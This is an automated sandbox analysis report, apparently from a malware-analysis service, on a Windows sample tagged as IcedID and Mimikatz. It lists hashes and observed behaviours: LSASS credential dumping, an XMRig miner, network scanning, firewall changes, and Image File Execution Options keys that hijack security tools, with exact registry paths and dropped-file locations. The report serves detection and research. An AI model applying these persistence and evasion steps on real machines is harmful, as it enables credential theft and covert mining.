Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-10-2024 23:42
Behavioral task
behavioral1
Sample
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe
-
Size
9.1MB
-
MD5
b5d93486e42cc2aa14651dfb2d37411d
-
SHA1
b2b4e5a1b5f396a54113bee8f2fff8346f802c65
-
SHA256
e69862594df7f736b416d26190a798b485a1b60142180d76ad0ac8da47ed1d75
-
SHA512
baafb777442ad218214039948833b857ec5973cf03173eb20e72a39b405ad573d3ac8d1e436893b11b3e406216d06b3156867fc38ed9f3adbb278326a25e1ea9
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
zgbptmp.exedescription pid Process procid_target PID 5052 created 2180 5052 zgbptmp.exe 38 -
Contacts a large (28664) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/324-177-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-186-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-203-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-216-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-225-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-235-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-251-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-259-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-265-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-281-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-282-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig behavioral2/memory/324-283-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/4260-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4260-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023ca1-6.dat mimikatz behavioral2/memory/4772-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3300-138-0x00007FF6B5610000-0x00007FF6B56FE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
wpcap.exezgbptmp.exedescription ioc Process File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zgbptmp.exe File opened for modification C:\Windows\system32\drivers\etc\hosts zgbptmp.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
zgbptmp.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zgbptmp.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 3600 netsh.exe 3672 netsh.exe -
Executes dropped EXE 29 IoCs
Processes:
zgbptmp.exezgbptmp.exewpcap.exelebepbdpg.exevfshost.exexohudmc.exexcllyg.exefuwlsselp.exevlcnek.exefuwlsselp.exefuwlsselp.exefuwlsselp.exezgbptmp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exefuwlsselp.exevykznlgit.exezgbptmp.exepid Process 4772 zgbptmp.exe 5052 zgbptmp.exe 244 wpcap.exe 984 lebepbdpg.exe 3300 vfshost.exe 4176 xohudmc.exe 2196 xcllyg.exe 4000 fuwlsselp.exe 324 vlcnek.exe 4484 fuwlsselp.exe 4512 fuwlsselp.exe 3012 fuwlsselp.exe 3792 zgbptmp.exe 4156 fuwlsselp.exe 4448 fuwlsselp.exe 4044 fuwlsselp.exe 1924 fuwlsselp.exe 1052 fuwlsselp.exe 4880 fuwlsselp.exe 4484 fuwlsselp.exe 4312 fuwlsselp.exe 3668 fuwlsselp.exe 2072 fuwlsselp.exe 1872 fuwlsselp.exe 2396 fuwlsselp.exe 3924 fuwlsselp.exe 3532 fuwlsselp.exe 436 vykznlgit.exe 6444 zgbptmp.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exelebepbdpg.exepid Process 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 244 wpcap.exe 984 lebepbdpg.exe 984 lebepbdpg.exe 984 lebepbdpg.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 80 ifconfig.me 81 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
zgbptmp.exewpcap.exexohudmc.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BB4F4B8E2B2CFC476849B6B724C153FF zgbptmp.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\xcllyg.exe xohudmc.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BB4F4B8E2B2CFC476849B6B724C153FF zgbptmp.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zgbptmp.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zgbptmp.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\xcllyg.exe xohudmc.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023cf2-134.dat upx behavioral2/memory/3300-136-0x00007FF6B5610000-0x00007FF6B56FE000-memory.dmp upx behavioral2/memory/3300-138-0x00007FF6B5610000-0x00007FF6B56FE000-memory.dmp upx behavioral2/files/0x0007000000023cfd-152.dat upx behavioral2/memory/4000-153-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4000-159-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/files/0x0007000000023cfa-163.dat upx behavioral2/memory/324-164-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/4484-168-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4512-174-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-177-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/3012-179-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-186-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/4156-189-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4448-193-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4044-197-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/1924-201-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-203-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/1052-206-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4880-210-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/4484-214-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-216-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/4312-219-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/3668-223-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-225-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/2072-228-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/1872-232-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/2396-234-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-235-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/3924-237-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/3532-239-0x00007FF79CD50000-0x00007FF79CDAB000-memory.dmp upx behavioral2/memory/324-251-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/324-259-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/324-265-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/324-281-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/324-282-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx behavioral2/memory/324-283-0x00007FF6EDA90000-0x00007FF6EDBB0000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
zgbptmp.execmd.exe2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exevykznlgit.exedescription ioc Process File created C:\Windows\unuiriqlb\UnattendGC\specials\vimpcsvc.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\docmicfg.exe zgbptmp.exe File created C:\Windows\qeqlilpn\spoolsrv.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\Shellcode.ini zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\lebepbdpg.exe zgbptmp.exe File opened for modification C:\Windows\qeqlilpn\docmicfg.xml zgbptmp.exe File opened for modification C:\Windows\qeqlilpn\spoolsrv.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\tucl-1.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\vimpcsvc.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\libeay32.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\trfo-2.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\docmicfg.xml zgbptmp.exe File created C:\Windows\qeqlilpn\docmicfg.xml zgbptmp.exe File opened for modification C:\Windows\qeqlilpn\vimpcsvc.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\trch-1.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\tibe-2.dll zgbptmp.exe File created C:\Windows\qeqlilpn\schoedcl.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\AppCapture64.dll zgbptmp.exe File opened for modification C:\Windows\unuiriqlb\Corporate\log.txt cmd.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\coli-0.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\schoedcl.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\spoolsrv.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\schoedcl.xml zgbptmp.exe File opened for modification C:\Windows\qeqlilpn\svschost.xml zgbptmp.exe File created C:\Windows\unuiriqlb\Corporate\mimilib.dll zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\scan.bat zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\spoolsrv.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\ssleay32.dll zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\ip.txt zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\wpcap.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\posh-0.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\vimpcsvc.xml zgbptmp.exe File created C:\Windows\qeqlilpn\vimpcsvc.xml zgbptmp.exe File opened for modification C:\Windows\qeqlilpn\zgbptmp.exe 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe File created C:\Windows\unuiriqlb\iutaiczjy\vykznlgit.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\svschost.xml zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\wpcap.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\libxml2.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\AppCapture32.dll zgbptmp.exe File created C:\Windows\ime\zgbptmp.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\exma-1.dll zgbptmp.exe File created C:\Windows\unuiriqlb\iutaiczjy\Packet.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\cnli-1.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\zlib1.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\svschost.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\svschost.xml zgbptmp.exe File created C:\Windows\qeqlilpn\zgbptmp.exe 2024-10-24_b5d93486e42cc2aa14651dfb2d37411d_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\qeqlilpn\schoedcl.xml zgbptmp.exe File created C:\Windows\unuiriqlb\upbdrjv\swrpwe.exe zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\spoolsrv.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\crli-0.dll zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\xdvl-0.dll zgbptmp.exe File created C:\Windows\unuiriqlb\Corporate\vfshost.exe zgbptmp.exe File opened for modification C:\Windows\unuiriqlb\iutaiczjy\Packet.dll zgbptmp.exe File opened for modification C:\Windows\unuiriqlb\iutaiczjy\Result.txt vykznlgit.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\ucl.dll zgbptmp.exe File created C:\Windows\qeqlilpn\svschost.xml zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\specials\docmicfg.xml zgbptmp.exe File created C:\Windows\unuiriqlb\Corporate\mimidrv.sys zgbptmp.exe File created C:\Windows\unuiriqlb\UnattendGC\schoedcl.xml zgbptmp.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2516 sc.exe 1736 sc.exe 1540 sc.exe 244 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
